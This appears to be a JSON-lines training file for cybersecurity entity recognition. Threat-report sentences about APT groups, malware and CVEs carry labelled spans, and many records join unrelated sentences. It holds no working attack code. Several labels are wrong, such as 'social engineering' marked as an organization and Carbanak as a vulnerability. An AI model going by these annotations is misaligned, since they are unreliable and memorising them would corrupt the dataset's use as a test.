{"text": "RATANKBA is delivered to its victims using a variety of lure documents , including Microsoft Office documents , malicious CHM files , and different script downloaders . We believe that it is likely threat actors will continue development Bookworm , and will continue to use it for the foreseeable future .", "spans": {"TOOL: RATANKBA": [[0, 8]], "TOOL: Microsoft Office documents": [[83, 109]], "TOOL: CHM files": [[122, 131]], "MALWARE: Bookworm": [[238, 246]]}, "info": {"id": "cyberner_stix_train_004439", "source": "cyberner_stix_train"}}
{"text": "Therefore , “ Agent Smith ” decompiles both the original application and the malicious payload and fuses them together . It is thus interesting to see Buhtrap add strategic web compromises to their arsenal . This is the first of several instances of Dexphot employing living-off-the-land techniques , the use of legitimate system processes for nefarious purposes . Now , there is a potential new competitor in the \" fake updates \" landscape that looks strangely familiar .", "spans": {"MALWARE: Agent Smith": [[14, 25]], "MALWARE: Dexphot": [[250, 257]]}, "info": {"id": "cyberner_stix_train_004440", "source": "cyberner_stix_train"}}
{"text": "APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia . The Infy group also appears to engage in espionage activities against foreign governments and businesses .", "spans": {"THREAT_ACTOR: APT40": [[0, 5]], "THREAT_ACTOR: Infy group": [[152, 162]], "ORGANIZATION: governments": [[226, 237]], "ORGANIZATION: businesses": [[242, 252]]}, "info": {"id": "cyberner_stix_train_004441", "source": "cyberner_stix_train"}}
{"text": "Zen 's rooting trojan apps target a specific device model with a very specific system image . In this case , it was a group commonly referred to as \" Nitro \" , which was coined by Symantec in its 2011 whitepaper . They sent spear phishing messages with the subject “ 2015 Taiwan Security and Cultural Forum Invitation Form ” , and used a different tool – a tool that we refer to as DOORJAMB – in their attempt to compromise the organization . Talos Takes Ep .", "spans": {"MALWARE: Zen": [[0, 3]], "ORGANIZATION: Symantec": [[180, 188]], "MALWARE: DOORJAMB": [[382, 390]], "ORGANIZATION: Talos": [[443, 448]]}, "info": {"id": "cyberner_stix_train_004442", "source": "cyberner_stix_train"}}
{"text": "But our researchers have predicted that these small Trojans would certainly be used to download some really bad malware that can actually harm the owners of the infected devices . In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . In recent OilRig attacks , the threat actors purport to be legitimate service providers offering service and technical troubleshooting as a social engineering theme in their spear-phishing attacks .", "spans": {"TOOL: NetTraveler": [[218, 229]], "VULNERABILITY: CVE-2012-0158": [[251, 264]], "TOOL: NetTraveler Trojan": [[280, 298]], "THREAT_ACTOR: actors": [[339, 345]], "ORGANIZATION: legitimate service providers": [[360, 388]], "ORGANIZATION: social engineering": [[441, 459]]}, "info": {"id": "cyberner_stix_train_004443", "source": "cyberner_stix_train"}}
{"text": "They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . MoneyTaker has primarily been targeting card processing systems , including the AWS CBR ( Russian Interbank System ) and purportedly SWIFT ( US ) .", "spans": {"VULNERABILITY: Heartbleed vulnerability": [[31, 55]]}, "info": {"id": "cyberner_stix_train_004444", "source": "cyberner_stix_train"}}
{"text": "BrainTest leverages an anti-uninstall watchdog that uses two system applications to monitor the removal of one of the components and reinstall the component . Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . Once executed , tactical malware contains the capability to profile the network and manoeuvre through it to identify a key system of interest .", "spans": {"MALWARE: BrainTest": [[0, 9]], "VULNERABILITY: anti-uninstall watchdog": [[23, 46]], "TOOL: .doc files": [[213, 223]], "MALWARE: RTF documents": [[244, 257]], "VULNERABILITY: CVE-2017-8570": [[282, 295]], "VULNERABILITY: Composite": [[298, 307]], "VULNERABILITY: Moniker": [[308, 315]], "ORGANIZATION: network": [[392, 399]]}, "info": {"id": "cyberner_stix_train_004445", "source": "cyberner_stix_train"}}
{"text": "and addressed to Yahya Al-Sinwar , who Hamas elected as its leader in Gaza in February 2017 .", "spans": {"ORGANIZATION: Hamas": [[39, 44]]}, "info": {"id": "cyberner_stix_train_004446", "source": "cyberner_stix_train"}}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . In Russia , there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "ORGANIZATION: military officials": [[63, 81]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]]}, "info": {"id": "cyberner_stix_train_004447", "source": "cyberner_stix_train"}}
{"text": ") Technical Analysis App Name : TikTok Pro Hash : 9fed52ee7312e217bd10d6a156c8b988 Package Name : com.example.dat.a8andoserverx Upon installation , the spyware portrays itself as TikTok using the name TikTok Pro . Gamaredon Group infects victims using malicious attachments , delivered via spear phishing techniques . Winnti Linux variant ’s core functionality is within ‘ libxselinux ’ .", "spans": {"SYSTEM: TikTok Pro": [[32, 42], [201, 211]], "SYSTEM: TikTok": [[179, 185]], "THREAT_ACTOR: Gamaredon Group": [[214, 229]], "TOOL: malicious attachments": [[252, 273]], "MALWARE: Winnti": [[318, 324]], "SYSTEM: Linux": [[325, 330]], "MALWARE: libxselinux": [[373, 384]]}, "info": {"id": "cyberner_stix_train_004448", "source": "cyberner_stix_train"}}
{"text": "This process is defined in the app ’ s AndroidManifest.xml config file , as shown in the following snippet . This was the first instance we have observed of APT41 targeting pro-democracy groups in Hong Kong . Our visibility into the operations of APT28 - a group we believe the Russian government sponsors - has given us insight into some of the government 's targets , as well as its objectives and the activities designed to further them .", "spans": {"THREAT_ACTOR: APT41": [[157, 162]], "ORGANIZATION: pro-democracy": [[173, 186]], "THREAT_ACTOR: APT28": [[247, 252]], "ORGANIZATION: Russian government": [[278, 296]], "ORGANIZATION: government": [[346, 356]]}, "info": {"id": "cyberner_stix_train_004449", "source": "cyberner_stix_train"}}
{"text": "Recognizing the significance of this threat group , Unit 42 continues to track the evolution of Nigerian cybercrime under the code name SilverTerrier . It's possible TG-3390 used a waterhole to infect data center employees .", "spans": {"THREAT_ACTOR: threat group": [[37, 49]], "ORGANIZATION: Unit 42": [[52, 59]], "THREAT_ACTOR: SilverTerrier": [[136, 149]], "THREAT_ACTOR: TG-3390": [[166, 173]], "ORGANIZATION: data center employees": [[201, 222]]}, "info": {"id": "cyberner_stix_train_004450", "source": "cyberner_stix_train"}}
{"text": "The mediaserver will first builds a new unique track , start to play the track , loop play all audio buffer , then finally stop the playback . Without any insight into the evidence Kaspersky has obtained , we can only repeat our view that Anunak has targeted only banks in Russia and we have no concrete reports of compromised banks outside of Russia directly related to this criminal group . As an example in the following obfuscated function , Ready to learn more about Malwarebytes for Business ?", "spans": {"ORGANIZATION: Kaspersky": [[181, 190]], "THREAT_ACTOR: Anunak": [[239, 245]], "ORGANIZATION: banks": [[264, 269], [327, 332]], "THREAT_ACTOR: criminal group": [[376, 390]], "TOOL: Malwarebytes for Business": [[472, 497]]}, "info": {"id": "cyberner_stix_train_004451", "source": "cyberner_stix_train"}}
{"text": "According to security 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 .", "spans": {"ORGANIZATION: 360 Threat Intelligence Center": [[22, 52]], "MALWARE: njRAT backdoor": [[101, 115]], "TOOL: Flash": [[257, 262]], "VULNERABILITY: CVE-2015-8651": [[265, 278]], "VULNERABILITY: CVE-2016-1019": [[281, 294]], "VULNERABILITY: CVE-2016-4117": [[301, 314]]}, "info": {"id": "cyberner_stix_train_004452", "source": "cyberner_stix_train"}}
{"text": "For example , numerous malware families register themselves as services during installation to guarantee persistence across reboots .", "spans": {}, "info": {"id": "cyberner_stix_train_004453", "source": "cyberner_stix_train"}}
{"text": "r1-r4 : This is a local privilege escalation ( root ) exploit , which includes : CVE-2013-6282 , camerageroot ( http : //www.77169.org/exploits/2013/20130414031700 ) , a rooting tool for mtk6592 and addtional exploit . In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves . DragonOK appears to operate out of China 's Jiangsu Province .", "spans": {"VULNERABILITY: CVE-2013-6282": [[81, 94]], "THREAT_ACTOR: PLATINUM": [[230, 238]], "VULNERABILITY: zero-day exploits": [[256, 273], [508, 525], [577, 594]], "THREAT_ACTOR: DragonOK": [[608, 616]]}, "info": {"id": "cyberner_stix_train_004454", "source": "cyberner_stix_train"}}
{"text": "The threat actors steal data from compromised systems over a long period of time , which likely indicates a long-term objective of monitoring the target's network .", "spans": {}, "info": {"id": "cyberner_stix_train_004455", "source": "cyberner_stix_train"}}
{"text": "Dropper payload – downloader DLL Internal name : msdetltemp.dll File format : PE32 DLL File size : 73 728 bytes MD5: f6f88caf49a3e32174387cacfa144a89 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.02.10 07:20:02 ( GMT ) Exported functions :", "spans": {"TOOL: DLL": [[29, 32], [83, 86]], "FILEPATH: msdetltemp.dll": [[49, 63]], "FILEPATH: f6f88caf49a3e32174387cacfa144a89": [[117, 149]], "ORGANIZATION: Microsoft": [[174, 183]], "TOOL: Visual Studio": [[184, 197]], "TOOL: GMT": [[239, 242]]}, "info": {"id": "cyberner_stix_train_004456", "source": "cyberner_stix_train"}}
{"text": "In 2014 , Unit 42 released a report titled \" 419 Evolution \" that documented one of the first known cases of Nigerian cybercriminals using malware for financial gain . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"ORGANIZATION: Unit 42": [[10, 17]], "THREAT_ACTOR: cybercriminals": [[118, 132]], "THREAT_ACTOR: attackers": [[172, 181]], "TOOL: emails": [[196, 202]], "FILEPATH: XLS files": [[228, 237]], "ORGANIZATION: employees working in the banking sector": [[241, 280]]}, "info": {"id": "cyberner_stix_train_004457", "source": "cyberner_stix_train"}}
{"text": "Once launched , null will first verify whether it is able to fork on the system and that there is no other instance of itself currently running by checking whether the local port number 6842 is available . It has conducted attacks on similar organizations in Saudi Arabia , likely because of the access that those organizations have . Daily_Report.docx : The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications .", "spans": {"FILEPATH: Daily_Report.docx": [[335, 352]], "THREAT_ACTOR: Winnti group": [[359, 371]], "ORGANIZATION: enterprises": [[407, 418]], "ORGANIZATION: pharmaceutics": [[436, 449]], "ORGANIZATION: telecommunications": [[454, 472]]}, "info": {"id": "cyberner_stix_train_004458", "source": "cyberner_stix_train"}}
{"text": "The payload will execute shell code to steal data from various applications . The attackers have taken great care to stay under the radar , imitating another attack group in the region . The group has heavily targeted the gaming industry , but it has also expanded the scope of its targeting .", "spans": {"THREAT_ACTOR: attackers": [[82, 91]]}, "info": {"id": "cyberner_stix_train_004459", "source": "cyberner_stix_train"}}
{"text": "However , among our Downeks samples , we found new versions apparently written in .NET .", "spans": {"MALWARE: Downeks": [[20, 27]], "TOOL: .NET": [[82, 86]]}, "info": {"id": "cyberner_stix_train_004460", "source": "cyberner_stix_train"}}
{"text": "“ .clic ” and “ k ( ) ; ” ) . We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems . ZXHttpProxy Run a HTTP proxy server on the workstation . It is still unclear whether its authors have any links to known cybercrime organizations .", "spans": {"THREAT_ACTOR: authors": [[287, 294]], "THREAT_ACTOR: cybercrime organizations": [[319, 343]]}, "info": {"id": "cyberner_stix_train_004461", "source": "cyberner_stix_train"}}
{"text": "Figure 25 : infected Android version distribution To further analyze “ Agent Smith ” ’ s infection landscape , we dived into the top 10 infected countries : Country Total Devices Total Infection Event Count Avg . Back in February , Trend Micro noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia . The domain address usually ends in a .info or .net TLD , while the file name for the actual payload consists of random characters , similar to the randomness previously seen being used to generate file names and scheduled tasks . In this case , Mandiant observed the process w3wp.exe , ( the IIS process associated with the Exchange web front - end ) spawning cmd.exe to write a file to disk .", "spans": {"SYSTEM: Android": [[21, 28]], "MALWARE: Agent Smith": [[71, 82]], "ORGANIZATION: Trend Micro": [[232, 243]], "THREAT_ACTOR: Patchwork": [[279, 288]], "THREAT_ACTOR: Confucius groups": [[293, 309]], "DOMAIN: .info": [[477, 482]], "DOMAIN: .net": [[486, 490]], "ORGANIZATION: Mandiant": [[685, 693]]}, "info": {"id": "cyberner_stix_train_004462", "source": "cyberner_stix_train"}}
{"text": "Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords .", "spans": {"VULNERABILITY: CVE-2017-11882": [[66, 80]], "MALWARE: 'NavShExt.dll'": [[147, 161]], "MALWARE: iexplore.exe": [[192, 204]]}, "info": {"id": "cyberner_stix_train_004463", "source": "cyberner_stix_train"}}
{"text": "The new class is called NotificationListener and extends the NotificationListenerService class . By relying on a native PDF command to navigate to a new URL , Zirconium successfully circumvented Chrome 's anti-redirect protection . APT12 has previously used the THREEBYTE backdoor . Proxy : Multi - hop Proxy A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 ( RDP ) , 139 ( Netbios ) , and 445 ( SMB ) enabling full remote access from outside the network and has also used TOR .004", "spans": {"THREAT_ACTOR: APT12": [[232, 237]], "MALWARE: THREEBYTE backdoor": [[262, 280]], "MALWARE: Multi - hop Proxy A backdoor": [[291, 319]], "THREAT_ACTOR: APT29": [[328, 333]], "TOOL: TOR": [[537, 540]]}, "info": {"id": "cyberner_stix_train_004464", "source": "cyberner_stix_train"}}
{"text": "Since Shamoon incidents feature the infiltration and escalation stages of targeted attacks , X-Force IRIS responders sought out the attackers ’ entry point .", "spans": {"TOOL: X-Force IRIS responders": [[93, 116]]}, "info": {"id": "cyberner_stix_train_004465", "source": "cyberner_stix_train"}}
{"text": "Kaspersky Lab products detect it as Trojan.AndroidOS.Dvmap.a . If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . In the RevengeHotels campaign , the downloaded files are .NET binaries protected with the Yoda Obfuscator . Uncovering weaknesses in Apple macOS and VMWare vCenter : 12 vulnerabilities in RPC implementation •", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "MALWARE: bot": [[68, 71]], "THREAT_ACTOR: RevengeHotels": [[219, 232]], "FILEPATH: .NET": [[269, 273]], "MALWARE: Yoda Obfuscator": [[302, 317]], "SYSTEM: Apple macOS": [[345, 356]], "SYSTEM: VMWare vCenter": [[361, 375]]}, "info": {"id": "cyberner_stix_train_004466", "source": "cyberner_stix_train"}}
{"text": "DHS has previously released Alert TA14-353A , which contains additional details on the use of a server message block ( SMB ) worm tool employed by these actors .", "spans": {"ORGANIZATION: DHS": [[0, 3]], "MALWARE: worm": [[125, 129]]}, "info": {"id": "cyberner_stix_train_004467", "source": "cyberner_stix_train"}}
{"text": "The agent appears to have been under development for at least five years and consists of three stages . From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . From January 2018 to March 2018 , through FireEye 's Dynamic Threat Intelligence , we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East .", "spans": {"VULNERABILITY: Carbanak": [[114, 122]], "ORGANIZATION: banks": [[159, 164]], "ORGANIZATION: electronic payment": [[169, 187]], "ORGANIZATION: space": [[229, 234]], "ORGANIZATION: FireEye 's Dynamic Threat Intelligence": [[279, 317]], "THREAT_ACTOR: attackers": [[332, 341]]}, "info": {"id": "cyberner_stix_train_004468", "source": "cyberner_stix_train"}}
{"text": "These entities are not regionally congruent , and the only shared victimology involves their organizational functions .", "spans": {}, "info": {"id": "cyberner_stix_train_004469", "source": "cyberner_stix_train"}}
{"text": "The Trojan allows the criminals to remotely control the victim ’ s computer and is capable of recording sound from a microphone . The backdoor will load the encrypted configuration file and decrypt it , then use Secure Sockets Layer ( SSL ) protocol to connect to command-and-control ( C&C ) servers . This suggests that this config is added manually to the sample after having been built . As we commonly see in the ransomware space , this threat is delivered through a variety of mechanisms which can include phishing and being dropped as secondary payloads from command and control ( C2 ) frameworks like Cobalt Strike .", "spans": {"TOOL: Secure Sockets Layer": [[212, 232]], "TOOL: SSL": [[235, 238]], "TOOL: command-and-control": [[264, 283]], "TOOL: Cobalt Strike": [[608, 621]]}, "info": {"id": "cyberner_stix_train_004470", "source": "cyberner_stix_train"}}
{"text": "As is common for malware , the GeminiDuke infostealer uses a mutex to ensure that only one instance of itself is running at a time .", "spans": {"MALWARE: GeminiDuke": [[31, 41]], "TOOL: infostealer": [[42, 53]]}, "info": {"id": "cyberner_stix_train_004471", "source": "cyberner_stix_train"}}
{"text": "These campaigns differ in tools , server infrastructure , and nuances in decoy content and intended targets .", "spans": {}, "info": {"id": "cyberner_stix_train_004472", "source": "cyberner_stix_train"}}
{"text": "Note that in almost all cases , this payload file , contained in zip archives , is named ‘ setting ’ or ‘ setting.o ’ . While investigating KerrDown we found multiple RAR files containing a variant of the malware . Magic Hound is an Iranian-sponsored threat group operating primarily in the Middle East that dates back as early as 2014 .", "spans": {"MALWARE: KerrDown": [[140, 148]], "ORGANIZATION: we": [[149, 151]], "THREAT_ACTOR: Magic Hound": [[215, 226]]}, "info": {"id": "cyberner_stix_train_004473", "source": "cyberner_stix_train"}}
{"text": "APT15 was targeting information related to UK government departments and military technology . Other samples were found bearing a compilation time as early as June 2012 and version 00002 .", "spans": {"THREAT_ACTOR: APT15": [[0, 5]], "ORGANIZATION: government": [[46, 56]], "ORGANIZATION: military technology": [[73, 92]]}, "info": {"id": "cyberner_stix_train_004474", "source": "cyberner_stix_train"}}
{"text": "EventBot loaded library Loaded library as seen in Logcat . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft’s Equation Editor (EQNEDT32) . FireEye has identified APT35 operations dating back to 2014 .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: RTF files": [[111, 120]], "VULNERABILITY: CVE-2018-0798": [[141, 154]], "ORGANIZATION: FireEye": [[213, 220]], "THREAT_ACTOR: APT35": [[236, 241]]}, "info": {"id": "cyberner_stix_train_004475", "source": "cyberner_stix_train"}}
{"text": "The threat group also reportedly targeted the German parliament and German Chancellor Angela Merkel's Christian Democratic Union party .", "spans": {}, "info": {"id": "cyberner_stix_train_004476", "source": "cyberner_stix_train"}}
{"text": "A successful network intrusion can have severe impacts , particularly if the compromise becomes public and sensitive information is exposed .", "spans": {}, "info": {"id": "cyberner_stix_train_004477", "source": "cyberner_stix_train"}}
{"text": "Previous versions were storing config values within the variables of a class , while the latest version is using SharedPreferences with some of the keys being identical to those used by Anubis : isAccessibility time_work time_start_permission url_inj Conclusion Ginp is a simple but rather efficient banking Trojan providing the basic functionality to be able to trick victims into delivering personal information . Our research partner Rapid7 investigated the Dropbox use and found that the attackers had used the same account to store exfiltrated data from a global apparel company . Another subdomain , bbs.softfix.co.kr was hosted on same IP address as bbs.gokickes.com , which was reported as the C2 server of Invader by Cyphort .", "spans": {"SYSTEM: Anubis": [[186, 192]], "MALWARE: Ginp": [[262, 266]], "ORGANIZATION: Rapid7": [[437, 443]], "TOOL: Dropbox": [[461, 468]], "THREAT_ACTOR: attackers": [[492, 501]], "DOMAIN: bbs.softfix.co.kr": [[606, 623]], "DOMAIN: bbs.gokickes.com": [[657, 673]], "TOOL: C2": [[702, 704]], "MALWARE: Invader": [[715, 722]], "ORGANIZATION: Cyphort": [[726, 733]]}, "info": {"id": "cyberner_stix_train_004478", "source": "cyberner_stix_train"}}
{"text": "While attribution of malware attacks is rarely simple or conclusive , during the course of this investigation I uncovered evidence that suggests the attacker might be affiliated with the state-sponsored group known as Sofacy Group ( also known as APT28 or Operation Pawn Storm ) .", "spans": {"THREAT_ACTOR: Sofacy": [[218, 224]], "THREAT_ACTOR: APT28": [[247, 252]], "THREAT_ACTOR: Operation Pawn Storm": [[256, 276]]}, "info": {"id": "cyberner_stix_train_004479", "source": "cyberner_stix_train"}}
{"text": "WildFire detects all SofacyCarberp payloads with malicious verdicts .", "spans": {"ORGANIZATION: WildFire": [[0, 8]], "MALWARE: SofacyCarberp": [[21, 34]]}, "info": {"id": "cyberner_stix_train_004480", "source": "cyberner_stix_train"}}
{"text": "The group's Cobalt Strike installation typically uses a payload named svchost.exe in an attempt to disguise Cobalt Strike activity as the legitimate Windows svchost.exe executable .", "spans": {"TOOL: Cobalt Strike": [[12, 25], [108, 121]], "FILEPATH: svchost.exe": [[70, 81], [157, 168]], "SYSTEM: Windows": [[149, 156]]}, "info": {"id": "cyberner_stix_train_004481", "source": "cyberner_stix_train"}}
{"text": "We have tracked and profiled this group through multiple investigations , endpoint and network detections , and continuous monitoring .", "spans": {}, "info": {"id": "cyberner_stix_train_004482", "source": "cyberner_stix_train"}}
{"text": "The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably .", "spans": {"ORGANIZATION: Symantec": [[49, 57]], "VULNERABILITY: (CVE-2019-0703)": [[58, 73]], "THREAT_ACTOR: Bahamut": [[146, 153]], "SYSTEM: Android": [[215, 222]], "MALWARE: malware": [[223, 230]]}, "info": {"id": "cyberner_stix_train_004483", "source": "cyberner_stix_train"}}
{"text": "The server-side component provides a simple graphical user interface for threat actors interacting with web shells .", "spans": {"TOOL: web shells": [[104, 114]]}, "info": {"id": "cyberner_stix_train_004484", "source": "cyberner_stix_train"}}
{"text": "The first document – dated April 10 , 2017 – is marked “ Very Secret ”", "spans": {}, "info": {"id": "cyberner_stix_train_004485", "source": "cyberner_stix_train"}}
{"text": "Dell SecureWorks Counter Threat Unit (TM ) ( CTU ) researchers investigated activities associated with Threat Group-3390 ( TG-3390 ) .", "spans": {"ORGANIZATION: Dell": [[0, 4]], "ORGANIZATION: SecureWorks Counter Threat Unit": [[5, 36]], "ORGANIZATION: CTU": [[45, 48]], "THREAT_ACTOR: Threat Group-3390": [[103, 120]]}, "info": {"id": "cyberner_stix_train_004486", "source": "cyberner_stix_train"}}
{"text": "The Word document usually exploits CVE-2012-0158 . LAS VEGAS—Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data .", "spans": {"MALWARE: Word document": [[4, 17]], "VULNERABILITY: CVE-2012-0158": [[35, 48]], "ORGANIZATION: Dell SecureWorks": [[118, 134]]}, "info": {"id": "cyberner_stix_train_004487", "source": "cyberner_stix_train"}}
{"text": "While you would virtually never see Western intelligence agencies going after the same target without de-confliction for fear of compromising each other ’s operations , in Russia this is not an uncommon scenario . “ Putin ’s Hydra : Inside Russia ’s Intelligence Services ” , a recent paper from European Council on Foreign Relations , does an excellent job outlining the highly adversarial relationship between Russia ’s main intelligence services – FSB , the primary domestic intelligence agency but one with also significant external collection and ‘ active measures ’", "spans": {"ORGANIZATION: FSB": [[451, 454]]}, "info": {"id": "cyberner_stix_train_004488", "source": "cyberner_stix_train"}}
{"text": "This functionality can be seen in Figure 1 . As can be observed in the illustration above , the makeself script is instructed to run ./setup.sh after unpacking . Embedded in this sample ’s configuration three command-and-control server addresses and two additional strings we believe to be campaign designators .", "spans": {"MALWARE: makeself script": [[96, 111]], "MALWARE: ./setup.sh": [[133, 143]]}, "info": {"id": "cyberner_stix_train_004489", "source": "cyberner_stix_train"}}
{"text": "January 2016 – May 2018 : In this stage , “ Agent Smith ” hackers started to try out 9Apps as a distribution channel for their adware . This algorithm was previously discussed by security researchers in a Confucius-related blog post . Its goal is a very common one in cybercriminal circles — to install a coin miner that silently steals computer resources and generates revenue for the attackers — yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats , intent on evading protections and motivated to fly under the radar for the prospect of profit . The activity we have observed , coupled with others in the information security industry , indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments .", "spans": {"MALWARE: Agent Smith": [[44, 55]], "MALWARE: Dexphot": [[402, 409]], "THREAT_ACTOR: threat actors": [[702, 715]]}, "info": {"id": "cyberner_stix_train_004490", "source": "cyberner_stix_train"}}
{"text": "The “ core ” module communicates with the C & C server , receiving the predetermined list of popular apps to scan the device for . So far , Unit 42 has seen infrastructure overlaps with servers hosting C2 servers for samples of the FFRAT , PlugX , Poison Ivy and Scieron Trojans , suggesting that the threat actors use these tools as the payload in their attacks . 1 、An installer with two URLs ; Scheduled Task / Job : Scheduled Task APT29 has used named and hijacked scheduled tasks to establish persistence .", "spans": {"ORGANIZATION: Unit 42": [[140, 147]], "TOOL: FFRAT": [[232, 237]], "TOOL: PlugX": [[240, 245]], "TOOL: Poison Ivy": [[248, 258]], "TOOL: Scieron Trojans": [[263, 278]], "THREAT_ACTOR: Scheduled Task APT29": [[420, 440]]}, "info": {"id": "cyberner_stix_train_004491", "source": "cyberner_stix_train"}}
{"text": "Using similar traits , such as copycat iconography and app or package names , victims are likely socially engineered into installing the malicious apps , especially when available on so-called third-party ( i.e . The BalkanDoor backdoor does not implement any exfiltration channel . From mid-2016 through early 2017 , APT33 compromised organizations located in Saudi Arabia and U.S. in the aerospace sector .", "spans": {"TOOL: BalkanDoor": [[217, 227]], "TOOL: backdoor": [[228, 236]], "THREAT_ACTOR: APT33": [[318, 323]], "ORGANIZATION: aerospace sector": [[390, 406]]}, "info": {"id": "cyberner_stix_train_004492", "source": "cyberner_stix_train"}}
{"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server .", "spans": {"VULNERABILITY: Carbanak": [[20, 28]], "THREAT_ACTOR: criminals": [[95, 104]], "ORGANIZATION: financial industry": [[145, 163]], "ORGANIZATION: customers": [[187, 196]], "VULNERABILITY: CVE-2017-7269": [[215, 228]], "ORGANIZATION: Microsoft": [[263, 272]], "TOOL: Internet Information Services": [[273, 302]], "TOOL: IIS": [[305, 308]]}, "info": {"id": "cyberner_stix_train_004493", "source": "cyberner_stix_train"}}
{"text": "New KASPERAGENT Malware Campaign .", "spans": {"MALWARE: KASPERAGENT": [[4, 15]]}, "info": {"id": "cyberner_stix_train_004494", "source": "cyberner_stix_train"}}
{"text": "The server is expected to send back executable code and one of the following commands :", "spans": {}, "info": {"id": "cyberner_stix_train_004495", "source": "cyberner_stix_train"}}
{"text": "It may be that these submissions are made from the author ’ s machine , or that they submit it to a detection service that in turn submits to online malware databases . Madcap” is similar to the XAgent malware , but the former is focused on recording audio . The Rocket Kitten attacker group 's main attack vector is spear-phishing .", "spans": {"MALWARE: Madcap”": [[169, 176]], "MALWARE: XAgent": [[195, 201]], "THREAT_ACTOR: Rocket Kitten": [[263, 276]]}, "info": {"id": "cyberner_stix_train_004496", "source": "cyberner_stix_train"}}
{"text": "The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities . The malicious attachments purported to be invitations or drafts of the agenda for the conference .", "spans": {"THREAT_ACTOR: hacking division": [[13, 29]], "ORGANIZATION: NSA": [[105, 108]], "FILEPATH: malicious attachments": [[197, 218]], "MALWARE: invitations": [[235, 246]], "MALWARE: drafts of the agenda": [[250, 270]]}, "info": {"id": "cyberner_stix_train_004497", "source": "cyberner_stix_train"}}
{"text": "Information about all actions performed by Rotexy is logged in the local database and sent to the C & C . The malicious loader will use dynamic-link library ( DLL ) hijacking — injecting malicious code into a process of a file/application — on sidebar.exe and launch dllhost.exe ( a normal file ) . Leafminer also utilized Process Doppelganging , a detection evasion technique first discussed at the Black Hat EU conference last year .", "spans": {"MALWARE: Rotexy": [[43, 49]], "MALWARE: sidebar.exe": [[244, 255]], "MALWARE: dllhost.exe": [[267, 278]], "THREAT_ACTOR: Leafminer": [[299, 308]]}, "info": {"id": "cyberner_stix_train_004498", "source": "cyberner_stix_train"}}
{"text": "CONTACTS – send text received from C & C to all user contacts . For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug . As of early June 2018 , the server hosted 112 files in a subdirectory that could be accessed through a public web shell planted by the attackers .", "spans": {"THREAT_ACTOR: Sowbug": [[98, 104]], "TOOL: Felismus backdoor": [[157, 174]], "MALWARE: adobecms.exe": [[234, 246]], "MALWARE: CSIDL_WINDOWS\\debug": [[250, 269]], "MALWARE: public web shell": [[375, 391]], "THREAT_ACTOR: attackers": [[407, 416]]}, "info": {"id": "cyberner_stix_train_004499", "source": "cyberner_stix_train"}}
{"text": "list harvesting . In all three incidents , the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials . SecureWorks said the adversary group is abusing a previously undisclosed vulnerability in Japanese Software Asset Management system on endpoints .", "spans": {"THREAT_ACTOR: attackers": [[47, 56]], "ORGANIZATION: SecureWorks": [[186, 197]], "VULNERABILITY: previously undisclosed vulnerability": [[236, 272]]}, "info": {"id": "cyberner_stix_train_004500", "source": "cyberner_stix_train"}}
